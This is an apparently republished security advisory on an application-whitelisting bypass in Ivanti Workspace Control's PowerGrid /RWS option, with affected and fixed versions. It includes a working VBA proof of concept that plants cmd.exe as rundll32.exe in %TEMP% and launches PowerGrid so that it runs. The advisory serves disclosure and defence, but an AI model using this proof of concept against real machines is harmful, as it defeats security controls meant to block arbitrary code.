Ivanti Workspace Control Application PowerGrid RWS Whitelist Bypass

2018.10.02
Credit: Yorick Koster
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

------------------------------------------------------------------------ Ivanti Workspace Control Application Whitelist bypass via PowerGrid /RWS command line argument ------------------------------------------------------------------------ Yorick Koster, August 2018 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was found that the PowerGrid application will execute rundll32.exe from a relative path when it is started with the /RWS command line option. An attacker can abuse this issue to bypass Application Whitelisting in order to run arbitrary code on the target machine. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully verified on Ivanti Workspace Control version 10.2.700.1. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue was resolved in Ivanti Workspace Control version 10.2.950.0. PowerGrid now uses the GetSystemDirectory() function to construct an absolute path to rundll32.exe. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20180801/ivanti-workspace-control-application-whitelist-bypass-via-powergrid-_rws-command-line-argument.html Proof of concept The VBA code below demonstrates this issue. The code tries to run cmd.exe from the %TEMP% folder. Private Sub PowerGridAWLBypass() On Error Resume Next Dim tmpPath, resPath, targetPath tmpPath = Environ("TEMP") resPath = Environ("RESPFDIR") targetPath = Environ("SystemRoot") & "\System32\cmd.exe" FileCopy targetPath, tmpPath & "\rundll32.exe" ChDir tmpPath Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") Dim oFile As Object Set oFile = fso.CreateTextFile(tmpPath & "\foo.xml") oFile.WriteLine "<foo></foo>" oFile.Close Set fso = Nothing Set oFile = Nothing Shell resPath & "\pwrgrid.exe /RWS foo.xml", vbNormalFocus End Sub


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top